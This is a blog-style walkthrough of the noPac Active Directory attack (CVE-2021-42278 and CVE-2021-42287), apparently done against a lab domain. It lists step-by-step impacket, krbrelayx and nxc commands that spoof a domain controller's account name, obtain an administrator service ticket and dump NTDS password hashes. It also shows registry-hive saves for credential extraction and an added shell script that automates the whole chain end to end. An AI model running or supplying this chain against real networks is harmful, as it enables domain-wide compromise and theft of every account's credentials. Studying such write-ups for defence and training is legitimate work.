noPac CVE

noPac (CVE-2021-42278 and CVE-2021-42287)

The attack chain, step by step:

  1. Obtain credentials for an unprivileged domain user.
  2. Use that user's MachineAccountQuota (ms-DS-MachineAccountQuota, 10 by default) to add a computer account to the domain; call it machine_account$.
  3. Rename the computer's sAMAccountName to the domain controller's name without the trailing $ (if the DC is DC01$, name your computer DC01). This is CVE-2021-42278: an unpatched DC does not check that a computer account's sAMAccountName ends in $.
  4. Request a Ticket-Granting Ticket (TGT) for the spoofed account DC01, authenticating with the machine password you set.
  5. Rename the computer back to machine_account$ (or any other name), so that no account named DC01 exists any more.
  6. Using the TGT you still hold, request a Service Ticket (ST) with S4U2self, impersonating the administrator. The KDC cannot find the principal DC01 named in the TGT, appends $ and resolves it to the real DC01$, so the ST it issues is for the domain controller itself (CVE-2021-42287).
  7. Profit: an administrator ticket for the DC's own service means domain-wide compromise.

Manual exploitation

  1. Check whether the target is vulnerable to noPac. The nopac module needs a domain account; the null session below only works if the DC still allows anonymous access, otherwise use the lilyle credentials from the following steps.
    
    nxc smb $target -u '' -p '' -M nopac
    
  2. Check whether we are allowed to create a machine account (MachineAccountQuota).
    
    # If the quota is greater than 0, proceed with the exploitation
    nxc ldap $target -u '' -p '' -M maq
    
  3. Create the machine account (this consumes one unit of lilyle's quota).
    
    addcomputer.py -computer-name 'WIN-UX1ZW42MGEL$' -computer-pass 'ChangeMe#1234' -dc-host FIRE -domain-netbios windcorp.thm 'windcorp.thm/lilyle:ChangeMe#1234'
    
  4. Clear the SPNs of the machine account (the -c flag of krbrelayx's addspn.py). addcomputer.py registered SPNs that contain the old name, and the DC rejects the sAMAccountName change while they are present.
    
    python3 /opt/krbrelayx/addspn.py -u 'windcorp.thm\lilyle' -p 'ChangeMe#1234' -t 'WIN-UX1ZW42MGEL$' -c fire.windcorp.thm
    
  5. Rename the sAMAccountName to the DC's name without the $ (the DC here is fire$, so the new name is fire).
    
    python3 renameMachine.py -current-name 'WIN-UX1ZW42MGEL$' -new-name 'fire' -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'lilyle':'ChangeMe#1234'
    
  6. Request a TGT for the spoofed account, authenticating as fire with the machine password we set. getTGT.py writes it to fire.ccache.
    
    getTGT.py -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'fire':'ChangeMe#1234'
    
  7. Export the ticket cache and inspect it.
    
    export KRB5CCNAME=fire.ccache; klist
    
  8. Rename the account back to its machine name. This has to happen before the next request: the KDC must fail to find an account called fire so that it falls back to fire$.
    
    python3 renameMachine.py -current-name 'fire' -new-name 'WIN-UX1ZW42MGEL$' windcorp.thm/lilyle:ChangeMe#1234
    

Looking at the ticket-granting ticket with klist, we can see the following:

  • Default principal: fire@WINDCORP.THM, i.e. the TGT was issued to the spoofed computer account fire in the windcorp.thm domain.
  • Service principal: krbtgt/WINDCORP.THM@WINDCORP.THM. A service principal of krbtgt confirms this is a TGT issued by the KDC rather than a service ticket.
  1. Now request a service ticket via S4U2self, impersonating administrator. -k -no-pass makes getST.py use the TGT from KRB5CCNAME. Because no account named fire exists any more, the KDC appends $ and resolves the name to fire$ (the DC), so the ticket it returns is encrypted with the DC's key. -altservice rewrites the service name in the unencrypted part of the ticket to CIFS/fire.windcorp.thm.
    
    getST.py -self -impersonate 'administrator' -altservice 'CIFS/fire.windcorp.thm' -k -no-pass -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'fire'
    
  2. Success: we now hold a service ticket for CIFS on the DC as administrator (a service ticket, not a TGT). Export it and use it.
    
    export KRB5CCNAME=administrator@CIFS_fire.windcorp.thm@WINDCORP.THM.ccache; klist
    
  3. Dump NTDS. -k --use-kcache makes nxc authenticate with the ticket in KRB5CCNAME.
    
    nxc smb windcorp.thm -k --use-kcache
    nxc smb windcorp.thm -k --use-kcache --ntds
    

    Alternatively, from a shell on the DC, save the registry hives locally. Note that SAM and SECURITY only hold the DC's local accounts and LSA secrets; the domain hashes live in NTDS.dit, which is what the --ntds option above extracts.

    reg.exe save hklm\sam SAM
    reg.exe save hklm\security SECURITY
    reg.exe save hklm\system SYSTEM
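The whole chain above as one script, added here as an example and not code from the original post. It runs exactly the tools and flags shown on this page; the helper functions (spoof_name, parse_maq, check_names, st_ccache, rename_back, run_nopac) are mine, as are the assumptions that the impacket scripts and nxc are on PATH, that addspn.py lives at /opt/krbrelayx/addspn.py, and that nxc's maq module prints the quota as "MachineAccountQuota: N".

```shell
#!/bin/sh
# Added example, not code from the original post: the manual noPac chain above
# as one script, with the checks that are easy to skip when typing it by hand.
# Assumptions (not stated on the page): impacket's addcomputer.py, getTGT.py,
# getST.py and renameMachine.py plus nxc are on PATH, krbrelayx's addspn.py is at
# /opt/krbrelayx/addspn.py, and nxc's maq module prints "MachineAccountQuota: N".
set -eu

ADDSPN="${ADDSPN:-python3 /opt/krbrelayx/addspn.py}"
RENAME="${RENAME:-python3 renameMachine.py}"

# The spoofed name is the DC's sAMAccountName without its trailing '$'.
spoof_name() {
  printf '%s\n' "${1%\$}"
}

# Pull the quota out of nxc's maq output (assumed format); prints nothing if absent.
parse_maq() {
  sed -n 's/.*MachineAccountQuota: \([0-9]*\).*/\1/p' | head -n 1
}

# Both names must end in '$' (computer accounts) and fit SAM's 20-character limit.
check_names() {
  case "$1" in *\$) ;; *) return 1 ;; esac
  case "$2" in *\$) ;; *) return 1 ;; esac
  [ "${#1}" -le 20 ] && [ "${#2}" -le 20 ]
}

# ccache file getST.py writes for the impersonated ticket; pattern taken from the
# post (administrator@CIFS_fire.windcorp.thm@WINDCORP.THM.ccache).
st_ccache() {
  printf '%s@CIFS_%s@%s.ccache\n' "$3" "$2" "$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')"
}

# Undo the collision: give the account its original machine name back.
rename_back() {
  # $1 domain, $2 dc_fqdn, $3 user, $4 pass, $5 machine, $6 spoof
  $RENAME -current-name "$6" -new-name "$5" -dc-ip "$2" "$1/$3:$4"
}

run_nopac() {
  domain="$1"; dc_fqdn="$2"; dc_sam="$3"; user="$4"; pass="$5"; machine="$6"; mpass="$7"
  check_names "$dc_sam" "$machine" || { echo "account names must end in '\$' and be <= 20 chars" >&2; return 1; }
  spoof="$(spoof_name "$dc_sam")"

  maq="$(nxc ldap "$dc_fqdn" -u "$user" -p "$pass" -M maq | parse_maq || true)"
  [ "${maq:-0}" -gt 0 ] || { echo "MachineAccountQuota is ${maq:-unknown}: cannot add a computer" >&2; return 1; }

  addcomputer.py -computer-name "$machine" -computer-pass "$mpass" -dc-host "$dc_fqdn" "$domain/$user:$pass"
  # Clear the SPNs first, otherwise the DC rejects the sAMAccountName change.
  $ADDSPN -u "$domain\\$user" -p "$pass" -t "$machine" -c "$dc_fqdn"
  $RENAME -current-name "$machine" -new-name "$spoof" -dc-ip "$dc_fqdn" "$domain/$user:$pass"

  # Between here and rename_back an account collides with the DC's name; restore
  # it even if the TGT request fails so the domain is not left in that state.
  if ! getTGT.py -dc-ip "$dc_fqdn" "$domain/$spoof:$mpass"; then
    rename_back "$domain" "$dc_fqdn" "$user" "$pass" "$machine" "$spoof"
    return 1
  fi
  rename_back "$domain" "$dc_fqdn" "$user" "$pass" "$machine" "$spoof"

  # No account named "$spoof" exists now, so S4U2self resolves it to "$dc_sam".
  KRB5CCNAME="$spoof.ccache"; export KRB5CCNAME
  getST.py -self -impersonate administrator -altservice "CIFS/$dc_fqdn" -k -no-pass -dc-ip "$dc_fqdn" "$domain/$spoof"
  KRB5CCNAME="$(st_ccache "$domain" "$dc_fqdn" administrator)"; export KRB5CCNAME
  nxc smb "$dc_fqdn" -k --use-kcache --ntds
}

# Usage with the values from the post (the chain only runs when NOPAC_RUN is set):
#   NOPAC_RUN=1 sh nopac.sh windcorp.thm fire.windcorp.thm 'fire$' lilyle 'ChangeMe#1234' 'WIN-UX1ZW42MGEL$' 'ChangeMe#1234'
if [ -n "${NOPAC_RUN:-}" ]; then
  run_nopac "$@"
fi
```

What the script adds over typing the steps is a hard stop when MachineAccountQuota is 0 and a rename-back that runs even if getTGT.py fails, so an account carrying the DC's name is never left behind. The order matters: the rename-back must complete before getST.py runs, because the S4U2self trick only works once no account named fire exists.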
    

Resources

This post is licensed under CC BY 4.0 by the author.